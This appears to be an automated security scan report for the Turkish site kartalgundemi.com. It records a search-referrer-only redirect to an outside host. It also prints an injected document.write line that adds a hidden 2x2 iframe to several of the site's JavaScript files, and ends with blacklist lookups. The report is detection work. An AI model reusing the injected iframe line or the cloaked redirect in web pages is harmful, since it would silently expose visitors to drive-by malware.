Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://www.kartalgundemi.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.kartalgundemi.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 08 Sep 2014 09:26:20 GMT Location: http://q-e.bplaced.net/cacf.html?h=948695 Server: Apache Content-Length: 225 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://www.kartalgundemi.com/ | 200 OK Content-Length: 57576 Content-Type: text/html | clean |
http://www.kartalgundemi.com/Scripts/jquery142.js | 200 OK Content-Length: 72485 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]||e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 8187 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; case "vspace": case "hspace": case "class": case "title": case "accesskey": case "name": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/swfobject.js | 200 OK Content-Length: 10379 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElemen Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://jqueryui.com/jquery-1.7.1.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://jqueryui.com/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
http://www.kartalgundemi.com/Scripts/homev1.js | 200 OK Content-Length: 6138 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
 var crslPluses; var admmnu=0; $.timer(3500, function (timer) { if( crslPluses!='crslPlus-v3' ){$('.crslPlus-v3 .crslPlus-next').click();} if( crslPluses!='headline-box-wrap' ){$('#headline-box .crslPlus-next').click();} }); $.timer(2500, function (timer) { var C = $(".crslPlus } function login_validator(theForm) { if(document.getElementById('mailgir').value == "E-Posta Adresiniz" || document.getElementById('mailgir').value == "" || document.getElementById('sifregir').value == "") { alert("Lütfen Mail Adresinizi ve Åifrenizi Giriniz..."); document.getElementById('mailgir').focus(); return(false); } return (true); } function MM_openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> | ||
http://www.kartalgundemi.com/Scripts/bookmark.js | 200 OK Content-Length: 3832 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695></iframe>');
<!-- function Social_Load() { var d=document; if(d.images){ if(!d.Social) d.Social=new Array(); var i,j=d.Social.length,a=Social_Load.arguments; for(i=0; i<a.length; i++) if (a[i].indexOf("#")!=0){ d.Social[j]=new Image; d.Social[j++].src=a[i];}} } function schnupp(n, d) { var p,i,x Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://q-e.bplaced.net/cacf.html?j=948695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://q-e.bplaced.net/cacf.html?j=948695> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kartalgundemi.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kartalgundemi.com/
Result: kartalgundemi.com is not infected or malware details are not published yet.
Result: kartalgundemi.com is not infected or malware details are not published yet.